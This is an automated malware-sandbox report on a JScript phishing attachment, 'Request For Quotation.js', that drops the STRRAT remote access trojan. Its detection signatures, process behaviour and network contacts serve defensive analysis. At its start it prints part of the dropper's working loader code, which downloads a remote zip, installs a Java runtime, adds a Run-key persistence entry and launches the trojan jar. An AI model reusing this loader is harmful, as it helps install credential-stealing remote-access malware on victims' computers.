"http://wshsoft.company/jv/jrex.zip", false);xHttp.setOption(2, 13056);xHttp.send();bStrm.Type = 1;bStrm.open();bStrm.write(xHttp.responseBody);bStrm.savetofile(appdatadir + "\\jre.zip", 2);break;}catch(err){WScript.Sleep(5000);}}while(true);UnZip(appdatadir + "\\jre.zip", appdatadir + "\\jre7");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion", "1.8", "REG_SZ");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\1.8\\JavaHome", appdatadir + "\\jre7", "REG_SZ");wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"");}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}function writeBytes(file, bytes){var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}function UnZip(zipfile, ExtractTo){if(fso.GetExtensionName(zipfile) == "zip"){if(!fso.FolderExists(ExtractTo)){fso.CreateFolder(ExtractTo);}var objShell = WScript.CreateObject("Shell.Application");var destination = objShell.NameSpace(ExtractTo);var zip_content = objShell.NameSpace(zipfile).Items(); for(i = 0; i < zip_content.Count; i++){if(fso.FileExists(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName
Yara detected AllatoriJARObfuscator
Source: Yara match File source: 00000001.00000002.3036224528.0000000009D63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 3300, type: MEMORYSTR
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Source: Request For Quotation.js String : entropy: 5.59, length: 205460, content: 'dmF{1}I{0}5lbTQ0Ow0KdmF{1}I{0}xvbmdUZXh0ID0gIlVFc0RCQlElITxDJSE8Z0klITxDcTh0MWclITwlITwlITwlITwlITw Go to definition
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_15453B8D push esp; retf 1_3_15453B8E
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1546CB44 push eax; retf 1_3_1546CB45
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_15478240 pushad ; ret 1_3_15478241
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_154781C8 pushad ; ret 1_3_154781C9
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1546FE6B push 486ECF49h; retf 1_3_1546FF2D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1546C270 push eax; ret 1_3_1546C271
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1546C8F8 pushad ; retf 1_3_1546C90D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_15478180 pushad ; ret 1_3_15478181
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1546C288 pushad ; ret 1_3_1546C289
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1546CB44 push eax; retf 1_3_1546CB45
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_15478240 pushad ; ret 1_3_15478241
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_154781C8 pushad ; ret 1_3_154781C9
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1546FE6B push 486ECF49h; retf 1_3_1546FF2D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1546C270 push eax; ret 1_3_1546C271
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1546C8F8 pushad ; retf 1_3_1546C90D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_15478180 pushad ; ret 1_3_15478181
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1546C288 pushad ; ret 1_3_1546C289
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0278D8F7 push 00000000h; mov dword ptr [esp], esp 1_2_0278D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0278A21B push ecx; ret 1_2_0278A225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0278A20A push ecx; ret 1_2_0278A21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0278BB67 push 00000000h; mov dword ptr [esp], esp 1_2_0278BB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0278B3B7 push 00000000h; mov dword ptr [esp], esp 1_2_0278B3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0278D8E0 push 00000000h; mov dword ptr [esp], esp 1_2_0278D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0278B947 push 00000000h; mov dword ptr [esp], esp 1_2_0278B96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0278C477 push 00000000h; mov dword ptr [esp], esp 1_2_0278C49D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_02829091 push cs; retf 1_2_028290B1
Uses cacls to modify the permissions of files
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: javaw.exe, 00000001.00000003.1741586011.0000000014CF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: wscript.exe, 00000000.00000003.1740296993.0000014A21D92000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\!<%!<%.B6
Source: javaw.exe, 00000001.00000003.1741586011.0000000014CF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: wscript.exe, 00000000.00000003.1740296993.0000014A21D92000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}C%!<gI
Source: javaw.exe, 00000001.00000002.3032808529.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: javaw.exe, 00000001.00000003.1741586011.0000000014CF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000001.00000002.3032808529.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000001.00000003.1741586011.0000000014CF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: java/lang/VirtualMachineError.classPK
Source: javaw.exe, 00000001.00000002.3032808529.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_027963B4 LdrInitializeThunk, 1_2_027963B4
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Memory protected: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\bszhidta.txt" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_027803C0 cpuid 1_2_027803C0
Queries the installed Java version
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\3300 VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\3608lock.file VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected STRRAT
Source: Yara match File source: 00000001.00000002.3036224528.0000000009D69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 3300, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected STRRAT
Source: Yara match File source: 00000001.00000002.3036224528.0000000009D69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 3300, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532997 Sample: Request For Quotation.js Startdate: 14/10/2024 Architecture: WINDOWS Score: 100 22 repo1.maven.org 2->22 24 github.com 2->24 26 2 other IPs or domains 2->26 34 Multi AV Scanner detection for domain / URL 2->34 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 5 other signatures 2->40 9 wscript.exe 1 2 2->9         started        signatures3 process4 file5 20 C:\Users\user\AppData\Roaming\bszhidta.txt, Zip 9->20 dropped 42 JScript performs obfuscated calls to suspicious functions 9->42 44 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->44 13 javaw.exe 23 9->13         started        signatures6 process7 dnsIp8 28 github.com 140.82.121.3, 443, 49730, 49737 GITHUBUS United States 13->28 30 140.82.121.4, 443, 57605, 57609 GITHUBUS United States 13->30 32 2 other IPs or domains 13->32 16 icacls.exe 1 13->16         started        process9 process10 18 conhost.exe 16->18         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
199.232.192.209
 dualstack.sonatype.map.fastly.net United States
54113 FASTLYUS false
140.82.121.3
 github.com United States
36459 GITHUBUS false
140.82.121.4
 unknown United States
36459 GITHUBUS false
199.232.196.209
 unknown United States
54113 FASTLYUS false

Contacted Domains

Name IP Active
github.com 140.82.121.3 true
dualstack.sonatype.map.fastly.net 199.232.192.209 true
15.164.165.52.in-addr.arpa unknown unknown
repo1.maven.org unknown unknown